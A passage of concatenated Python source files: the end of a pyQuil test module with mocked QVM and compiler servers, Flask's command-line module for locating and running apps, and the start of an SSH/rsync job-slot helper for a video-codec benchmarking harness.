def test_sync_run_and_measure_mock(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "multishot-measure",
"qubits": [0, 1],
"trials": 2,
"compiled-quil": "H 0\nCNOT 0 1\n",
"rng-seed": 52,
}
return "[[0,0],[1,1]]"
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", text=mock_response)
assert mock_qvm.run_and_measure(BELL_STATE, [0, 1], trials=2) == [[0, 0], [1, 1]]
with pytest.raises(ValueError):
mock_qvm.run_and_measure(EMPTY_PROGRAM, [0])
def test_sync_run_and_measure(qvm):
assert qvm.run_and_measure(BELL_STATE, [0, 1], trials=2) == [[1, 1], [0, 0]]
assert qvm.run_and_measure(BELL_STATE, [0, 1]) == [[1, 1]]
with pytest.raises(ValueError):
qvm.run_and_measure(EMPTY_PROGRAM, [0])
WAVEFUNCTION_BINARY = (
b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\xe6\xa0\x9ef"
b"\x7f;\xcc\x00\x00\x00\x00\x00\x00\x00\x00\xbf\xe6\xa0\x9ef\x7f;\xcc\x00"
b"\x00\x00\x00\x00\x00\x00\x00"
)
WAVEFUNCTION_PROGRAM = Program(
Declare("ro", "BIT"), H(0), CNOT(0, 1), MEASURE(0, MemoryReference("ro")), H(0)
)
def test_sync_expectation_mock(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "expectation",
"state-preparation": BELL_STATE.out(),
"operators": ["Z 0\n", "Z 1\n", "Z 0\nZ 1\n"],
"rng-seed": 52,
}
return b"[0.0, 0.0, 1.0]"
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", content=mock_response)
result = mock_qvm.expectation(
BELL_STATE, [Program(Z(0)), Program(Z(1)), Program(Z(0), Z(1))]
)
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", content=mock_response)
z0 = PauliTerm("Z", 0)
z1 = PauliTerm("Z", 1)
z01 = z0 * z1
result = mock_qvm.pauli_expectation(BELL_STATE, [z0, z1, z01])
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
def test_sync_expectation(qvm):
result = qvm.expectation(BELL_STATE, [Program(Z(0)), Program(Z(1)), Program(Z(0), Z(1))])
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
def test_sync_expectation_2(qvm):
z0 = PauliTerm("Z", 0)
z1 = PauliTerm("Z", 1)
z01 = z0 * z1
result = qvm.pauli_expectation(BELL_STATE, [z0, z1, z01])
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
def test_sync_paulisum_expectation(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "expectation",
"state-preparation": BELL_STATE.out(),
"operators": ["Z 0\nZ 1\n", "Z 0\n", "Z 1\n"],
"rng-seed": 52,
}
return b"[1.0, 0.0, 0.0]"
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", content=mock_response)
z0 = PauliTerm("Z", 0)
z1 = PauliTerm("Z", 1)
z01 = z0 * z1
result = mock_qvm.pauli_expectation(BELL_STATE, 1j * z01 + z0 + z1)
exp_expected = 1j
np.testing.assert_allclose(exp_expected, result)
def test_sync_wavefunction(qvm):
qvm.random_seed = 0 # this test uses a stochastic program and assumes we measure 0
result = qvm.wavefunction(WAVEFUNCTION_PROGRAM)
wf_expected = np.array([0.0 + 0.0j, 0.0 + 0.0j, 0.70710678 + 0.0j, -0.70710678 + 0.0j])
np.testing.assert_allclose(result.amplitudes, wf_expected)
def test_validate_noise_probabilities():
with pytest.raises(TypeError):
validate_noise_probabilities(1)
with pytest.raises(TypeError):
validate_noise_probabilities(["a", "b", "c"])
with pytest.raises(ValueError):
validate_noise_probabilities([0.0, 0.0, 0.0, 0.0])
with pytest.raises(ValueError):
validate_noise_probabilities([0.5, 0.5, 0.5])
with pytest.raises(ValueError):
validate_noise_probabilities([-0.5, -0.5, -0.5])
def test_validate_qubit_list():
with pytest.raises(TypeError):
validate_qubit_list([-1, 1])
with pytest.raises(TypeError):
validate_qubit_list(["a", 0], 1)
def test_prepare_register_list():
with pytest.raises(TypeError):
prepare_register_list({"ro": [-1, 1]})
# ---------------------
# compiler-server tests
# ---------------------
def test_get_qc_returns_remote_qvm_compiler(qvm: QVMConnection, compiler: QVMCompiler):
with patch.dict("os.environ", {"COMPILER_URL": "tcp://192.168.0.0:5550"}):
qc = get_qc("9q-square-qvm")
assert isinstance(qc.compiler, QVMCompiler)
mock_qpu_compiler_server = Server()
@mock_qpu_compiler_server.rpc_handler
def native_quil_to_binary(payload: BinaryExecutableRequest) -> BinaryExecutableResponse:
assert Program(payload.quil).out() == COMPILED_BELL_STATE.out()
time.sleep(0.1)
return BinaryExecutableResponse(program=COMPILED_BYTES_ARRAY)
@mock_qpu_compiler_server.rpc_handler
def get_version_info() -> str:
return "1.8.1"
@pytest.fixture
def m_endpoints():
return "tcp://127.0.0.1:5550", "tcp://*:5550"
def run_mock(_, endpoint):
# Need a new event loop for a new process
mock_qpu_compiler_server.run(endpoint, loop=asyncio.new_event_loop())
@pytest.fixture
def server(request, m_endpoints):
proc = Process(target=run_mock, args=m_endpoints)
proc.start()
yield proc
os.kill(proc.pid, signal.SIGINT)
@pytest.fixture
def mock_qpu_compiler(request, m_endpoints, compiler: QVMCompiler):
return QPUCompiler(
quilc_endpoint=compiler.client.endpoint,
qpu_compiler_endpoint=m_endpoints[0],
device=NxDevice(nx.Graph([(0, 1)])),
)
def test_quil_to_native_quil(compiler):
response = compiler.quil_to_native_quil(BELL_STATE)
print(response)
assert response.out() == COMPILED_BELL_STATE.out()
def test_native_quil_to_binary(server, mock_qpu_compiler):
p = COMPILED_BELL_STATE.copy()
p.wrap_in_numshots_loop(10)
# `native_quil_to_executable` will warn us that we haven't constructed our
# program via `quil_to_native_quil`.
with pytest.warns(UserWarning):
response = mock_qpu_compiler.native_quil_to_executable(p)
assert response.program == COMPILED_BYTES_ARRAY
def test_local_rb_sequence(benchmarker):
response = benchmarker.generate_rb_sequence(2, [PHASE(np.pi / 2, 0), H(0)], seed=52)
assert [prog.out() for prog in response] == [
"H 0\nPHASE(pi/2) 0\nH 0\nPHASE(pi/2) 0\nPHASE(pi/2) 0\n",
"H 0\nPHASE(pi/2) 0\nH 0\nPHASE(pi/2) 0\nPHASE(pi/2) 0\n",
]
def test_local_conjugate_request(benchmarker):
response = benchmarker.apply_clifford_to_pauli(Program("H 0"), PauliTerm("X", 0, 1.0))
assert isinstance(response, PauliTerm)
assert str(response) == "(1+0j)*Z0"
def test_apply_clifford_to_pauli(benchmarker):
response = benchmarker.apply_clifford_to_pauli(Program("H 0"), PauliTerm("I", 0, 0.34))
assert response == PauliTerm("I", 0, 0.34)
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import platform
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, itervalues, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in itervalues(module.__dict__) if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
"one.".format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
"could not call it without arguments. Use "
"\"FLASK_APP='{module}:{factory}(args)'\" to specify "
"arguments.".format(factory=attr_name, module=module.__name__)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(module=module.__name__)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if "script_info" in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r"^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$", app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
"expression.".format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval("({args},)".format(args=args))
except (ValueError, SyntaxError) as e:
raise NoAppException(
"Could not parse the arguments in "
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
"be called with the specified arguments.".format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from "
'"{module}:{app_name}".'.format(module=module.__name__, app_name=app_name)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
"\n\n{tb}".format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException('Could not import "{name}".'.format(name=module_name))
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
message = "Python %(python)s\n" "Flask %(flask)s\n" "Werkzeug %(werkzeug)s"
click.echo(
message
% {
"python": platform.python_version(),
"flask": __version__,
"werkzeug": werkzeug.__version__,
},
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands wil be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path)
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(" * Environment: {0}".format(env))
if env == "production":
click.secho(
" WARNING: This is a development server. "
"Do not use it in a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(" * Debug mode: {0}".format("on" if debug else "off"))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires pyOpenSSL.", ctx, param
)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super(SeparatedPathType, self).convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loader",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
" are separated by '{}'.".format(os.path.pathsep)
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = "Python %s on %s\nApp: %s [%s]\nInstance: %s" % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup, "r") as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
cli.main(prog_name="python -m flask" if as_module else None)
if __name__ == "__main__":
main(as_module=True)
|
sshslot.py
|
from utility import *
import subprocess
import sys
import os
import threading
import time
ssh_privkey_file = os.getenv("SSH_PRIVKEY_FILE", "daala.pem")
binaries = {
'daala':['examples/encoder_example','examples/dump_video'],
'x264': ['x264'],
'x264-rt': ['x264'],
'x265': ['build/linux/x265'],
'x265-rt': ['build/linux/x265'],
'xvc': ['build/app/xvcenc', 'build/app/xvcdec'],
'vp8': ['vpxenc','vpxdec'],
'vp9': ['vpxenc','vpxdec'],
'vp9-rt': ['vpxenc','vpxdec'],
'vp10': ['vpxenc','vpxdec'],
'vp10-rt': ['vpxenc','vpxdec'],
'av1': ['aomenc','aomdec'],
'av1-rt': ['aomenc','aomdec'],
'thor': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'thor-rt': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'rav1e': ['target/release/rav1e'],
'svt-av1': ['Bin/Release/SvtAv1EncApp', 'Bin/Release/libSvtAv1Enc.so.0']
}
# Finding files such as `this_(that)` requires `'` be placed on both
# sides of the quote so the `()` are both captured. Files such as
# `du_Parterre_d'Eau` must be converted into
#`'du_Parterre_d'"'"'Eau'
# ^^^ Required to make sure the `'` is captured.
def shellquote(s):
return "'" + s.replace("'", "'\"'\"'") + "'"
class Machine:
def __init__(self,host,user='ec2-user',cores=18,work_root='/home/ec2-user',port=22,media_path='/mnt/media'):
self.host = host
self.user = user
self.cores = cores
self.work_root = work_root
self.port = str(port)
self.media_path = media_path
self.log = None
self.slots = []
def rsync(self, local, remote):
return subprocess.call(['rsync', '-r', '-e', "ssh -i "+ssh_privkey_file+" -o StrictHostKeyChecking=no -p "+str(self.port), local, self.user + '@' + self.host + ':' + remote])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.port,'-o',' StrictHostKeyChecking=no',
self.user+'@'+self.host,
command.encode("utf-8")])
def get_slots(self):
slots = []
#by doing the machines in the inner loop,
#we end up with heavy jobs split across machines better
for i in range(0,self.cores):
slots.append(Slot(self, i, self.log))
self.slots = slots
return slots
def get_name(self):
return self.host
class SlotProcess:
def __init__(self, log):
self.p = None
self.can_kill = threading.Event()
self.log = log
def kill(self):
# wait until there is actually a process to kill
success = self.can_kill.wait(20)
if not success:
rd_print(self.log,"Waited too long for process to kill.")
if self.p:
rd_print(self.log,"Will try to kill anyway.")
else:
rd_print(self.log,"Aborting kill.")
return
try:
self.p.kill()
except Exception as e:
rd_print(self.log,"Couldn't cancel work item",e)
def communicate(self):
return self.p.communicate()
def shell(self, args):
self.p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.can_kill.set()
#the job slots we can fill
class Slot:
def __init__(self, machine, num, log):
self.machine = machine
